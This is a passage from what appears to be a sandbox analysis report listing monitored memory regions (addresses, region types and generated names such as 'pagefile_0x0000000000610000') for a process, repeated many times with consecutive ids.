monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8364 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8365 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8366 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8367 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8368 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8369 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8370 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8371 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8372 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8373 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8374 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8375 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8376 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8377 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8378 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8379 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8380 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8381 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8382 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8383 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8384 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8385 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8386 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8387 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8388 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8389 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8390 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8391 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8392 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8393 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8394 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8395 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8396 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8397 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8398 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8399 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8400 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8401 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8402 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8403 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8404 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8405 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8406 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8407 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 8408 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 8409 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8410 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8411 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8412 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8413 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8414 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8415 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8416 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8417 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8418 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8419 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8420 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 8421 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 8422 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8423 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8424 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8425 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 8426 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 8427 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8428 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8429 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8430 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8431 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8432 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8433 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8434 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8435 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8436 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8437 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8438 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8439 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8440 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8441 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8442 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8443 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8444 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8445 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8446 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8447 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8448 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8449 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8450 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8451 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8452 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8453 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8454 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8455 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8456 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8457 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8458 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8459 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8460 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8461 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8462 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8463 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8464 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8465 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8466 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8467 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8468 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8469 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8470 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8471 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8472 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8473 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8474 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8475 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8476 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8477 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8478 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8479 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 8480 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 8481 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8482 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8483 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8484 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8485 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8486 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8487 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8488 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8489 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8490 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8491 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8492 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8493 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8494 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8495 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8496 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8497 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8498 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8499 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8500 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8501 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8502 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8503 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8504 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8505 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8506 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8507 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8508 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8509 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8510 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8511 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8512 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8513 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8514 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8515 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8516 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8517 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8518 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8519 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8520 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8521 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8522 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8523 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8524 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 8525 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 8526 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8527 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8528 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8529 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8530 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8531 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8532 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8533 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8534 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8535 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8536 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8537 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8538 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8539 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8540 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 8541 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 8542 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8543 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8544 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8545 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 8546 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 8547 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8548 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 